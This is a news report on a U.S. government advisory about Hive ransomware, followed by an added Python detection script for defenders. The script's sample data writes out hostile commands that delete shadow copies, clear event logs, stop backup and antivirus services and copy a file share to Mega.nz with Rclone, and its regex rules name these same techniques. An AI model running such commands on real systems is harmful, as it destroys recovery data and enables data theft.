
The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S. government agency cybersecurity advisory.

In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors have victimized over 1,300 companies globally and have received $100 million in ransom payments as of November.

Since its discovery in June 2021, Hive has rapidly expanded its reach and has also quickly evolved, as seen in a new variant observed in February that switched from the Go programming language to Rust. "Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks," according to the Thursday advisory.

"From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH)."

Because the ransomware affiliates deploying Hive rely on differing tactics, techniques and procedures (TTPs), the actors use various methods to gain initial access to victim networks. Most often, however, government agencies have observed Hive being spread through phishing emails, exploitation of known vulnerabilities, and vulnerable external-facing remote services such as Remote Desktop Protocol (RDP) and virtual private networks (VPNs). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPNs (CVE-2020-12812). Hive actors have also exploited several Microsoft Exchange vulnerabilities: a security feature bypass (CVE-2021-31207), a remote code execution bug (CVE-2021-34473) and a privilege escalation issue (CVE-2021-34523), the three flaws chained together in the attack known as ProxyShell.

After gaining initial access to victim systems, Hive actors have carried out several anti-detection measures, including terminating processes related to backups and antivirus, removing all volume shadow copies and deleting Windows event logs. "Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz," said researchers. "In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD."

Hive isn't the only ransomware group to close in on the healthcare sector, which faces unique security issues due to the sensitive nature of the critical care offered to patients and the personal data involved.
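The post-access behaviour the advisory attributes to Hive (stopping backup and antivirus processes, deleting volume shadow copies, clearing Windows event logs, and exfiltrating with Rclone to Mega.nz) is easy to hunt for in process-creation telemetry. The following is an added example written for this page, not code from the article or from the FBI/CISA/HHS advisory. It runs a handful of regex rules over constructed 4688/Sysmon-style process-creation records and then correlates hits per host; the record layout, the sample records and the specific command lines in the rules (vssadmin/wmic shadow deletion, wevtutil log clearing, net stop/taskkill against backup and AV names, rclone copy to a mega: remote) are assumptions about how these techniques typically appear, not strings quoted from the page.

```python
"""Detect Hive-style recovery inhibition, anti-forensics and Rclone exfiltration
in Windows process-creation records.

Added example; not code from the article or the advisory it reports on. The
record format (a process-creation event reduced to a dict), all sample records
and the command-line patterns below are constructed assumptions for illustration.
"""
import re
from collections import defaultdict

# Each rule: (technique name, regex run against the full command line).
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("shadow_copy_deletion",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete\b", re.I)),
    ("event_log_cleared",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b|\bClear-EventLog\b", re.I)),
    ("backup_or_av_stopped",
     re.compile(r"\b(?:net1?(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|taskkill(?:\.exe)?\b.*?/im)"
                r"\s+\S*?(?:backup|veeam|sql|msmpeng|defend|antivirus|mcshield)", re.I)),
    ("rclone_transfer",
     re.compile(r"\brclone(?:\.exe)?\b.*\b(?:copy|sync|move|copyto|moveto)\b", re.I)),
]
# An rclone remote named "mega" is the Mega.nz backend; treat that as exfiltration.
MEGA_REMOTE = re.compile(r"\bmega\b", re.I)

# Constructed sample telemetry: one benign workstation, one file server under attack,
# and one admin running a harmless wevtutil query.
SAMPLE_RECORDS = [
    {"host": "WS01", "user": "CORP\\jdoe", "pid": 4120,
     "cmd": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.docx"'},
    {"host": "FS01", "user": "CORP\\svc_backup", "pid": 2210, "cmd": "vssadmin.exe list shadows"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2244, "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2250, "cmd": "wmic.exe shadowcopy delete"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2261, "cmd": "wevtutil.exe cl Security"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2262, "cmd": "wevtutil.exe cl System"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2270, "cmd": "net stop VeeamBackupSvc /y"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2275, "cmd": "taskkill /F /IM MsMpEng.exe"},
    {"host": "FS01", "user": "CORP\\admin", "pid": 2301,
     "cmd": r"C:\Users\Public\rclone.exe copy \\FS01\Finance mega:backup --transfers 32"},
    {"host": "WS02", "user": "CORP\\ops", "pid": 900, "cmd": "wevtutil.exe qe Security /c:5"},
]


def classify(record):
    """Return the technique name the record's command line matches, or None."""
    cmd = record["cmd"]
    for name, rx in RULES:
        if rx.search(cmd):
            if name == "rclone_transfer" and MEGA_REMOTE.search(cmd):
                return "exfil_rclone_to_mega"
            return name
    return None


def analyze(records):
    """Run every record through the rules and return one finding per matching record."""
    findings = []
    for rec in records:
        technique = classify(rec)
        if technique:
            findings.append({"host": rec["host"], "pid": rec["pid"], "user": rec["user"],
                             "technique": technique, "cmd": rec["cmd"]})
    return findings


def techniques_per_host(findings):
    """Group the distinct techniques seen on each host for correlation."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["technique"])
    return dict(by_host)


PRECURSORS = {"shadow_copy_deletion", "event_log_cleared", "backup_or_av_stopped"}


def likely_ransomware_precursor(techniques):
    """Two or more distinct recovery-inhibition/anti-forensics techniques on one host,
    or one of them alongside Rclone exfiltration to Mega, is the pre-encryption pattern
    described in the article; a single hit on its own is often an administrator."""
    hits = techniques & PRECURSORS
    exfil = "exfil_rclone_to_mega" in techniques
    return len(hits) >= 2 or (len(hits) >= 1 and exfil)


if __name__ == "__main__":
    found = analyze(SAMPLE_RECORDS)
    for f in found:
        print(f"{f['host']} pid={f['pid']} {f['technique']}: {f['cmd']}")
    for host, techs in techniques_per_host(found).items():
        verdict = "LIKELY RANSOMWARE PRECURSOR" if likely_ransomware_precursor(techs) else "review"
        print(f"{host}: {sorted(techs)} -> {verdict}")
```

Run stand-alone it flags seven of the ten constructed records, all on FS01, and marks that host as a likely ransomware precursor; the benign `vssadmin list shadows` and `wevtutil qe` lines are left alone. The per-host correlation is the point: any one of these commands is routine in isolation, but backup services stopped, shadow copies gone and logs cleared on the same host within a short window is the sequence to alert on, ideally before the encryptor runs.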
